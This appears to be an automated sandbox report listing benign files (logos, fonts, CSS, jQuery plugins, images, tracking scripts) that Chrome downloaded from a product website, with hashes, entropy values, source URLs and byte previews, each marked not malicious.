                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 26.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 205.4 137.5" style="enable-background:new 0 0 205.4 137.5;" xml:space="preserve">.<style type="text/css">...st0{fill:#EA7024;}.</style>.<g>..<path class="st0" d="M60.5,17.6c-8-5.7-19.9-6.3-26.7-6.3H8v118.9H36c22.4-0.6,36.4-6.9,45.4-21.8L67.7,48.1L60.5,17.6z... M40.1,101.5V40.9c14.7,0,17.2,18,17.2,30.9C57.3,83,54.8,101.3,40.1,101.5z"/>..<path class="st0" d="M89.5,129.8h31.2l6.8-48.2c1.4-9.6,1.7-18,2.5-26.2h0.3c1.1,8.2,1.6,16.6,3.3,26.2l8.7,48.2h31.1l24-118.9H166...l-7.1,47.9c-1.4,9.3-1.8,18.4-2.7,25.8h-0.3c-1.3-8.7-2.2-17.2-3.6-25.8L144.1,11h-27.6l-8.4,47.9c-1.6,8.8-1.7,17.5-2.7,26.3h-0.3...c-1.1-8.8-2-17.5-3.3-26.3L94.7,11H63l0.5,2.3l7.2,32.2l15.7,70.5L89.5,129.8z"/>.</g>.</svg>.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):514
                                                                                                                                                                                    Entropy (8bit):5.233195916225045
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:BDA44F293D2468281B7F74F918DA3DA4
                                                                                                                                                                                    SHA1:92350670C7F623DC330D02064B96C5466B56E14E
                                                                                                                                                                                    SHA-256:FDE59DA4B90354CE9EE1088FA10647E4C447A16560168835E57DA9BBEB48208C
                                                                                                                                                                                    SHA-512:D541F22A4E2B8AA28477FBA28157EFEF05B085F38137715219F436C449A94AE252CABE985473861046EA14A073D30DD30EC8CA54C03107CB0031E2201E1592B8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-keys
                                                                                                                                                                                    Preview:{. "keys": [{. "id": "0380000000000000",. "key": "XmPOd3q/COhH7Q8XorOech+gR4Ge+NAtl/r2CW9vzmk\u003d". }, {. "id": "3D80000000000000",. "key": "Q9B+cquZ6ASghUPQFD0npO2TAYCGKwar6JH1yOYE+SA\u003d". }, {. "id": "7D80000000000000",. "key": "xJGbSXiDGWcbhJEjN+kJDwXZWQooGfzJcYjFvZsusEU\u003d". }, {. "id": "BD80000000000000",. "key": "y9YRmEN5RNlz5zyAbqipb47Uz37GIlQn5rC9Uc6sgAI\u003d". }, {. "id": "FD80000000000000",. "key": "jUN0Wu+LEnEFJOdk7DCEM8GbtsK9Fo/plgHv7o9H+j8\u003d". }].}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 36848, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):36848
                                                                                                                                                                                    Entropy (8bit):7.995112872818791
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:3CCD9AB2050B2F26898B77AF9148B8E2
                                                                                                                                                                                    SHA1:7F9F46B2FB3F121F3C0600E1182D725B1BE6C176
                                                                                                                                                                                    SHA-256:258F9F1B553BB57419619F41D3B1445226C7BC63D2A3409EFEF4A68426709E94
                                                                                                                                                                                    SHA-512:6F9F764D77A563A132E952BD49790F22AA80A88F885BB9AA82F1C25BBC9FBA1451F3E4FADD1EABDF86DC77F7FCDC13C5B183AEE617077F3061E04D54E7246AFE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu0-K4.woff2
                                                                                                                                                                                    Preview:wOF2..............*....~.................................J?HVAR.".`?STAT.\'2.../l.....,.A....0..4.6.$..8. .....8..[..Q#.....m..A......N.2Y......6.....e..iIe.m.KZ......=...,.....-+..6"..s.j..23.+.Y.vY....YX'.w^N..@...-mu....!...9.i....DS.=....>.a.t.Q,\t..G.2!.....[../S........D..A&.8...!.A.7K+2Q.c....D..._..i....*..J(f=7...C.[..n6.B....B.t.z4C.T+...b...!.B..x..*r>D....q.C......9.Z....?....{./.......D#..N..O]+..5.5.......{".l.XD...,."a.l0bD..FcD].W..^.qzQ.^.uMA...>h.0.K=.4..h.....T..mG.+.........n+_DG..I.GT..B..igd.X.!u.n&U.;.C.~S.........d....h..{.... .. ..KL...!N.$..5.a.SN......6.=}j.HJ:J.pG.n.~b.AOS..'.T....G.........E.]..O\...|.p/...l..-.i4?....J*0..y.........N.O....3.4&ql...t.T.......I..q..$..........i.n..m..O...v....P.m!...........K...M....r.6Q......:E..$.D>.it...h..>B...R..~.NmF.....x{1`.c..[brR..T....%..\.wz.^..V...?..YG^...eok....b.uu.V.ZqP`.04,.^..L.K.l....i......%Vj..'.0...o..g.....w7z..i`8R.Cj........V.HV.;..w.Qg......pY...b.3$
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2927
                                                                                                                                                                                    Entropy (8bit):4.225358897457278
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:AD9123774F392B6B87F3E180B6D4C687
                                                                                                                                                                                    SHA1:20DE0FF22C2AB4E2B430B5ECE5220E834D664F1F
                                                                                                                                                                                    SHA-256:0C87288B9099733622F4BD66B91C67B238EF992159D264079D7C8249D3E6ECFF
                                                                                                                                                                                    SHA-512:1DC5614BF0F10B4152345ADD3D2CDA48EA4A1EB69E56D8CF0C284C41482B21F649A42CAAAD157B651629A4517D4029E5FB203A9492FE6348FFAE7A9E448B48CB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/js/jquery-phone-inputmask.js?20250530073516
                                                                                                                                                                                    Preview:// ==================================================..// ..// jquery-input-mask-phone-number v1.0..//..// Licensed (The MIT License)..// ..// Copyright . Raja Rama Mohan Thavalam <rajaram.tavalam@gmail.com>..//..// ==================================================..;..(function ($) {.. $.fn.usPhoneFormat = function (options) {.. var params = $.extend({.. format: 'xxx-xxx-xxxx',.. international: false,.... }, options);.... if (params.format === 'xxx-xxx-xxxx') {.. $(this).bind('paste', function (e) {.. e.preventDefault();.. var inputValue = e.originalEvent.clipboardData.getData('Text');.. if (!$.isNumeric(inputValue)) {.. return false;.. } else {.. inputValue = String(inputValue.replace(/(\d{3})(\d{3})(\d{4})/, "$1-$2-$3"));.. $(this).val(inputValue);.. $(this).val('');.. inp
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 52942
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14978
                                                                                                                                                                                    Entropy (8bit):7.985429716109114
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:80198BD036982841517DC1A396AC0568
                                                                                                                                                                                    SHA1:25FC587D640415663F1078608B33131000BBE8D6
                                                                                                                                                                                    SHA-256:CA9C1946152551AACCEC10C6C3300A573846EC18C4872EC8DE86114C879D0312
                                                                                                                                                                                    SHA-512:6F02715636E03E15262A5A4E302731BC113548C9FC9F59BD768215370150F50D353886EF4F3F27CD8C688BE10FE22991E5B591089FBA04C12A7381392CC772DA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://bat.bing.com/bat.js
                                                                                                                                                                                    Preview:...........}.w..._...>d.+..d.&.m.&m^....T..(..........m..v._.HPv....s..`0...f..E...Y...~..]GE..J..[.rP..f..i..P..YpW$.*.^.....$[...p+...uD..El0..8_{f......&3?.........o.........M.L.....5.=.!..U..5..?...4..e....._.".......f.|...9a..{.1..G.C..J..<[.ex.m...,.......PY.7lB.yV&.....|.7"..........O.y...**.=....~..."{<$I.....b...:..y.f>...O..<A..*..X...0.I.`..U..u.W..*M.r.)^l6)MJ...:k.DeU$k.v.&).<.R.g.S...j".:..E~..Y...w[Yt.D0.."Z.z$.j...V........W..{#5...@..........H..v|.n7..+.e..#......./.....h..'$)..r.n..]Gi...0q{.......E.<*.=........Z.BU._...%e............f..v....].y..~4..>....m~w.=.....f....w..^..!....u...:WU.OH..$F..n.y..-zl.."1q.@...........B.e=...l...{I.g*..g.Lb.p...$".EN..,..0.u..#.\.wb.Bc#.Sd..I..52c..F.$5rR...o.*L .h.k.o.....W..|v.M.V....__n.|....oOgC.^.5bb..So....xe...H.*.>!.j..D|..+$......b9.l.].&..t.,gQ.j...;R..Q%.g.y... fP)4..md<;.p.....*...../...=#..SW..H/..%..=Y..0...p..U...GB... ...&_,.b....8"yv...&..YIb...[.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14073
                                                                                                                                                                                    Entropy (8bit):4.878917416979254
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:306FD7E25CA59EEF7D091F45712A4B88
                                                                                                                                                                                    SHA1:506AEE99E85F41BB32AF29BA2F2D6005969957C5
                                                                                                                                                                                    SHA-256:53DBFBD98E6E13123395A394590C2AAE4A0591062F9507DB90EF07AA13511128
                                                                                                                                                                                    SHA-512:1A14E7B99526A414CE41C30C51D0FC134B0FF6E57BAC260FCD1CDE75FECFAD020592BD78F7C3E298998AE4F2A8F099FA63BD7450F2079C3DD75C3EEBDEA19636
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/css/dw.css?20250530073516
                                                                                                                                                                                    Preview:::selection {.. background: #B4D5FE;.. color: inherit;..}.....text-responsive {.. font-size: calc(100% + 1vw + 1vh);..}.....italian-font {.. font-family: 'Italian Plate No2 Expanded'!important;..}.....brighten img {.. filter: brightness(100%);.. -webkit-filter: brightness(100%);.. -webkit-transition: all 1s ease;.. -moz-transition: all 1s ease;.. -o-transition: all 1s ease;.. -ms-transition: all 1s ease;.. transition: all 1s ease;..}.....brighten img:hover {.. filter: brightness(90%);.. -webkit-filter: brightness(90%);..}.....pp-cb-box {.. position: relative;.. display: block;.. max-width: 1180px;.. margin: 0 auto;..}.....subsubtab-selector.active {.. color: #292929 !important;.. border-bottom: 2px solid #ff6c00;.. padding-bottom: 15px;..}.....input-search>button[type="submit"] {.. position: absolute;.. top: 0px;.. bottom: 0;.. width: 50px;.. background: transparent;.. cursor: pointer;.. display: flex;..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 73x72, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5597
                                                                                                                                                                                    Entropy (8bit):7.7762718640183195
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:D5EEA780FC3189545EA045B09E4115CC
                                                                                                                                                                                    SHA1:8F8981C267B19FEBC197DF3C35B94762FD19B5C9
                                                                                                                                                                                    SHA-256:32200A145AED997B26BDA4342885F3A8E85D1A45E029BB3AF75A9589258446D6
                                                                                                                                                                                    SHA-512:8C8BB87BDA37286C25C7803A8BBBC4C225B841518ADC06293B9B4B30E9765B525CFA81BA7E230A69C834EC69FB10EE32F94BEFCD0EDB8C6387F5442FD94A743C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="uuid:9E3E5C9A8C81DB118734DB58FDDE4BA7" xmpMM:DocumentID="xmp.did:735B72E6477211ECB8BDB3060B8AFEEC" xmpMM:InstanceID="xmp.iid:735B72E5477211ECB8BDB3060B8AFEEC" xmp:CreatorTool="Adobe Illustrator 24.3 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0e7e163f-387d-5640-8525-967c941de0a4" stRef:documentID="adobe:docid:photoshop:4426e061-dcdc-aa44-9118-671f329bebaa"/> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">DW_HomePage_JC</r
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 3000x1264, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1696764
                                                                                                                                                                                    Entropy (8bit):7.983047175964804
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:AE4DBC522A8727AC067B021F7899F664
                                                                                                                                                                                    SHA1:D76A8E9519F967BB089A0800B7D0CCD8F837FA39
                                                                                                                                                                                    SHA-256:7B1F04CFE0C5A82F9A4883F944DEB7F647AAB049DF7EB2F97E2CE65DD2D7B8BF
                                                                                                                                                                                    SHA-512:73F7B92E4AB3B4BD6669F51950DBEFEB84A00B3F9DDBAD1B5DF95F6737E4C0F30B71A110364B1B3142C6E309F9F10F1A4C6690C0CB781E0124386CEA4E259B13
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/img/banner/DW-Built-for-users_Banner.jpg
                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......Z......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="6B7D3962444967FA4F23B38495BB038D" xmpMM:DocumentID="xmp.did:ABA1D5854A5911EFBE49950E916A8AF0" xmpMM:InstanceID="xmp.iid:ABA1D5844A5911EFBE49950E916A8AF0" xmp:CreatorTool="Adobe Photoshop Lightroom Classic 7.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:d800436a-3b08-47df-832e-bdc9a9fb0002" stRef:documentID="adobe:docid:photoshop:9afa5b2a-02fb-0c4c-b253-75e2c1dc3732"/> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">BANGK
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):10910
                                                                                                                                                                                    Entropy (8bit):7.979165944035339
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:B69632A6DA0F577057258F14D12A5369
                                                                                                                                                                                    SHA1:2EBD2ACC2E51C42E8A597E651411B3A7A1252983
                                                                                                                                                                                    SHA-256:D49907B22CC589A6F8FB0B3437DDB4EE28D903F2F9E2684D164E28B77858E47E
                                                                                                                                                                                    SHA-512:B317CC9C960372C4AB09379C087D87084049D5AF124614DC00B56A00DAF3580EA73D33DF01BF50A844D3AC0C491D33D22BB157D6372548E68442150B42FAC703
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js
                                                                                                                                                                                    Preview:.n..H.......c....f..?_.1.e.J....2-.y..y.=...^.m..u.I.Y.G,.......t.z..[W..N*.B..,..E..J3KR* .{....}O4.RZ.......g...D...R.....rC.....#.^.......puYCe ..6....f_{.%..h...0...........Z.....0\.9.*K.NA.H.<O...=h....gj....E.U.'.R.C.....0....FOSL..S..#.E...(T...0......L.......>..../.f...y.,.!. b.qy!..../....s.B..%..].h...w<.<..sm.....F|..[.x....:...-...wQ....+..........q.).C..G........?.).ZE./.S..=p<.#.60.....I.x?..$.Rj...BOB..%N........D4.......9.d..........U...I.>..>.U.3)....o...hm.@(]xq.F...?.....P.=......(......>g+..s........n$[4H>.....'.4..Cb.....+<x9.V`.k..k.....{..Xk9.8..V...3.<.mp.?.?E?X..@'....x.#}.......9...[|.d....?..9......-n.xf..V.}Y./g~ ...{J.IF[..y.+..e......'.....}..h[..my.4..yR.|S..R>.hQ.y..9>h..~....}..........s...y.!..-...G.....E.?....Io.y.p.E....CL..........@O.....Z.K.]<.U......g..F.|.'.M..-q.c.M..':..J....<../n.J_.9.<RDA.....<.5.K..../......$.Xm.m<..........M~..8..#..6~=.2.5..3......Yz0...?..^....6.}.w#..h.....|..rMOBa0.,..`..^...$.?v.I.._
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 216
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                    Entropy (8bit):6.754939969821488
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:3D55624C7FF99B2C1174E9D259A4DE8F
                                                                                                                                                                                    SHA1:DED0CB523B4C571D339225E7F7F3737F12925E35
                                                                                                                                                                                    SHA-256:B3C3C317828E087B3B0E9E457273F2F907CD6CC940F424B0E1288C140B906AD7
                                                                                                                                                                                    SHA-512:39D6276D930D9BF819E6AD7CF43C1DBCC4FE0A17793221AD6B25D4D99A4ED3E6D6A4A6BA276E2165DCD5E8C1C5D90A04E909AC9C295815C31ED7508A6B73F754
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhJ0CRL7AHJ5iU6aEgUNeuFP4BIFDZxOStASBQ14bxIZEgUNEg_8ahIFDaNfVFUSBQ3aCZcoEgUNoHnZphIFDVW79W8SBQ1GZxV9EgUNA2jJZRIFDbdIA_wSBQ1JQK9JEgUNxmiw_BIFDVNaR8UhzgFLelx0UB8=?alt=proto
                                                                                                                                                                                    Preview:..........5.I..0...,.<x..ZYD...[...&....J......>lB...o..Dy..g.*r..@.@....`.....OS...W..h..f....I..Q.}B...6}.}@......@o.}.w.E...T...jO... q8..F .M...e........_.a`?....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):49078
                                                                                                                                                                                    Entropy (8bit):3.9606913770443946
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:0D6855D88E1B84CD46374EFE59329517
                                                                                                                                                                                    SHA1:C1B8628404B87D77355FD0CDB38EEF4F386FDBC5
                                                                                                                                                                                    SHA-256:044DADD9C2903EFC64CD7F948F4107A1AE50ED5ACD6F86EAFEF1BD3A9C4FEA40
                                                                                                                                                                                    SHA-512:CEA30AC572FC41F33AD09412012C15855BD2436D3B11071C0D0150A66AE218D524A01CF667132D2CA2835433E48DAB7069281B489DF88D1FDD6D7805CBC94127
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/js/jqBootstrapValidation.js?20250530073516
                                                                                                                                                                                    Preview:/* jqBootstrapValidation.. * A plugin for automating validation on Twitter Bootstrap formatted forms... *.. * v1.3.6.. *.. * License: MIT <http://opensource.org/licenses/mit-license.php> - see LICENSE file.. *.. * http://ReactiveRaven.github.com/jqBootstrapValidation/.. */..(function ($) {.. var createdElements = [];.. var defaults = {.. options: {.. prependExistingHelpBlock: false.. , sniffHtml: true, // sniff for 'required', 'maxlength', etc.. preventSubmit: true, // stop the form submit event from firing if validation fails.. submitError: false, // function called if there is an error when trying to submit.. submitSuccess: false, // function called just before a successful submit event is sent to the server.. semanticallyStrict: false, // set to true to tidy up generated HTML output.. bindEvents: [],.. autoAdd: {.. helpBlocks: true.. }.. , filter:
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4886
                                                                                                                                                                                    Entropy (8bit):7.96149134789335
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:5C0D92427143A79CF4D1E00EFD5E70E0
                                                                                                                                                                                    SHA1:2114105BBB35BFDD490B6F39BA93A9BE59752CDA
                                                                                                                                                                                    SHA-256:E6A88B591E572638762E4B93BC02E9C1A268B634634D50CDA91E7CFE4356BDDA
                                                                                                                                                                                    SHA-512:92C7016119E6141DF965E4B474C5948D70FF9FDA589864B3CD096ED7FB28CCE87472EFD62BD827391E638B9CFE6E7158FE86B7FC8DFD8527D345325EDC94C9C2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/bootstrap-tagsinput/0.8.0/bootstrap-tagsinput.js
                                                                                                                                                                                    Preview:.EW.,...7.@..@....7.h.gS.s9=3.|..H&N...l).mZ....ArKi........m.N..1.2.r!.. ..4.".p0H~w_~.J|F..a."..!r.?".......s.dDd.U..3.+.,.... >O....0.{..M..i.... .|t...H.$.5>tv...^_..R.j..h..:J5..J$n#.7.._.!...t.k....~..4.\g..s)..8p &..-RD...^..'.h..zb..........1.k....K....!:S]PQ...u...FV.*......"...lx.f.../.o.^[.,G.|.c_OV#p.....2...._.u%..eu.#...`S....Vw.... .oQ..b.._h.Dc.+B..X.h.g.j_#rl...9....m...8..7.v+1...q.GpO....~..C..."..g:j....)K.'N+m..........pC.0c........$.K.wc..w..<.h)..U..Z^0.....da[........._..<....I`.. .\... ..*.....Tr..l..'....w.......;.A.5e..%{.qL.-.)s..........M.=l6..S...n..,}h....d..;}J.Q.h.:..=.D.P...V*%)6rc1.qg....i.;.8D+n...4..U...b..+w.4...0f.X.*..../,`...<.:.......V.w...A.K..i.:..V.s.(....s.. }.....O...e.d5.`>.5.?.]......h.A..Q..Oz&.$2....a...@... ..mf...P.}".+.-.u-qQ...._..v...B:Il I^Q*V5..L.....goH...2.V..:..!^...C....{...8.+.v.Xf.bN4........i>.|k.......hI$........}<Z.P.UH.d..M..L.g..J.i`...I!......../..(.E.m..`.c.Z...... .m.!.].'...?]...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=676, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=815], progressive, precision 8, 815x676, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):405838
                                                                                                                                                                                    Entropy (8bit):7.978730463682178
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:4BA24D4C01F4FA72C31077517E028BBD
                                                                                                                                                                                    SHA1:B8A4BA895A21C8B965D5F18EBAA8EBAA5C22BD34
                                                                                                                                                                                    SHA-256:737A2364A2974A047EB996A3F433E83111A3FF6478085D94A55355B5D6C57C52
                                                                                                                                                                                    SHA-512:61EFD02BDEFE6B68F29DF085C562AFEE26739555AFD052FCF65E0E4CCDDBDAB89BA2C83C6F8A1977DC741DD9712F799A374984303A6467F7E8EFD57374D4F93A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:.....$Exif..MM.*.............../.......................................................................................(...........1.....!.....2..........i.............$............'.......'.Adobe Photoshop 23.4 (Macintosh).2022:07:06 10:08:54..............0231......................./...........................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...;.9H.2..TT......-..'.aD..'...AI....h...*..A....Ny.....ql5.9..w...M.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 22.0 (Windows), datetime=2022:07:06 19:07:57], baseline, precision 8, 883x676, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):252142
                                                                                                                                                                                    Entropy (8bit):7.73134289210857
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:5F5D8664D15BBE3624AE060DDCCAF2BE
                                                                                                                                                                                    SHA1:3AC85C646C136BF9D8E5399A59B8B97F69069D85
                                                                                                                                                                                    SHA-256:22ED181AACC82CD262ABDE789FB13D87C942C1F4E95AC6040F17EFE2664AC59C
                                                                                                                                                                                    SHA-512:BBCB8C4B31B87927CC0B92B5C94BFC9B7E1A81C51B284CDC1E77B0BCF0C92DA830DC58AE2A7BDAEA168BCA872B2C547F929EE215C33105B253E5C85C5F88355C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 22.0 (Windows).2022:07:06 19:07:57.............................s..........................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..N..t..'L..z...TtJ0...O......h.......IN.J.....3...v...i.....?...u\..OHfC...=..m..z.{}_O.........IOX.s.K.}g.8.....?dc......k>.._......8....h.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 176
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):138
                                                                                                                                                                                    Entropy (8bit):6.42544719223838
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:C3F21A15D8B7E40F8F3B1CAC22252E2C
                                                                                                                                                                                    SHA1:ED5A05B91FAE12F86DDB8FDEFDC20EC9E432C14A
                                                                                                                                                                                    SHA-256:5D29BB44D3E8DA4D999041C43BB434F06CAA1D3C4647A1AE84A282E13555D4F8
                                                                                                                                                                                    SHA-512:E697A91546A7CB3609E6ADC03A67E2934E1A261AA187759F5C1CCE2F87B256A8DEE8F76746A057858AF5505E4017ECDD57BCADCF129F1929C0955EE416150DCB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhJtCcy1a-skvjEIEgUNeuFP4BIFDZxOStASBQ14bxIZEgUNEg_8ahIFDaNfVFUSBQ3aCZcoEgUNoHnZphIFDVW79W8SBQ1GZxV9EgUNA2jJZRIFDbdIA_wSBQ1JQK9JEgUNxmiw_CEQI0lycSqZMBIZCbIU8CfoHsjPEgUN9QTFJyGlPkaVuNZCZQ==?alt=proto
                                                                                                                                                                                    Preview:..........s...v*743..OwOw....C...!lC....(.. .E....&+.0(..6Nt.J.......B....A..Q.a.Ps\.}sr....,.j...-..f.'......=\.B]+.....mm........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
